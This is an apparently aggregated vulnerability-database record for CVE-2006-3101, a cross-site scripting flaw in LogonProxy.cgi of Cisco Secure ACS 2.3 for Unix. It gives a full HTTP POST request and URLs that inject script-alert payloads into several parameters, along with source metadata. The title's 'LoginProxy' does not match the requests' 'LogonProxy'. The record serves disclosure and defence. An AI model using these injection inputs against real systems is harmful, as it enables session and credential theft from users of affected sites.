ID

VAR-E-200606-0457


CVE

cve_id:CVE-2006-3101

Trust: 1.6

sources: EXPLOIT-DB: 28030 // EDBNET: 49874

EDB ID

28030


TITLE

Cisco Secure ACS 2.3 - 'LoginProxy.cgi' Cross-Site Scripting - Unix remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 28030

DESCRIPTION

Cisco Secure ACS 2.3 - 'LoginProxy.cgi' Cross-Site Scripting. CVE-2006-3101CVE-26531 . remote exploit for Unix platform

Trust: 0.6

sources: EXPLOIT-DB: 28030

AFFECTED PRODUCTS

vendor:ciscomodel:secure acsscope:eqversion:2.3

Trust: 1.0

vendor:ciscomodel:secure acs for unixscope:eqversion:2.3

Trust: 0.3

sources: BID: 18449 // EXPLOIT-DB: 28030

EXPLOIT

source: https://www.securityfocus.com/bid/18449/info

Cisco Secure ACS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

This issue affects Cisco Secure ACS version 2.3 for UNIX; other versions may also be vulnerable.

POST http://www.example.com:80/CScgi/LogonProxy.cgi HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://10.17.12.184/cs/index.html
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
Host: 10.17.12.184
Content-Length: 33
Pragma: no-cache
Server=0.0.0.0&error=<script>alert("help")</script>

http://www.example.com/CScgi/LogonProxy.cgi?Server=0.0.0.0&error=<script>alert("help")</script>
http://www.example.com/CScgi/LogonProxy.cgi?Server=10.17.12.184/Logon?null&SSL=<script>alert('help')</script>
http://www.example.com/CScgi/LogonProxy.cgi?Ok=<script>alert('help')</script>

Trust: 1.0

sources: EXPLOIT-DB: 28030

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 28030

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 28030

TYPE

'LoginProxy.cgi' Cross-Site Scripting

Trust: 1.0

sources: EXPLOIT-DB: 28030

CREDITS

Thomas Liam Romanis

Trust: 0.6

sources: EXPLOIT-DB: 28030

EXTERNAL IDS

db:BIDid:18449

Trust: 2.5

db:EXPLOIT-DBid:28030

Trust: 1.9

db:NVDid:CVE-2006-3101

Trust: 1.6

db:EDBNETid:82945

Trust: 0.6

db:EDBNETid:49874

Trust: 0.6

sources: BID: 18449 // EXPLOIT-DB: 28030 // EDBNET: 82945 // EDBNET: 49874

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2006-3101

Trust: 1.6

url:https://www.securityfocus.com/bid/18449/info

Trust: 1.0

url:https://www.intelligentexploit.com

Trust: 0.6

url:https://www.exploit-db.com/exploits/28030/

Trust: 0.6

url:http://www.cisco.com/en/us/products/sw/voicesw/ps4625/index.html

Trust: 0.3

url:https://www.exploit-db.com/exploits/28030

Trust: 0.3

sources: BID: 18449 // EXPLOIT-DB: 28030 // EDBNET: 82945 // EDBNET: 49874

SOURCES

db:BIDid:18449
db:EXPLOIT-DBid:28030
db:EDBNETid:82945
db:EDBNETid:49874

LAST UPDATE DATE

2022-07-27T09:31:36.761000+00:00


SOURCES UPDATE DATE

db:BIDid:18449date:2006-06-16T15:56:00

SOURCES RELEASE DATE

db:BIDid:18449date:2006-06-15T00:00:00
db:EXPLOIT-DBid:28030date:2006-06-15T00:00:00
db:EDBNETid:82945date:2006-06-28T00:00:00
db:EDBNETid:49874date:2006-06-15T00:00:00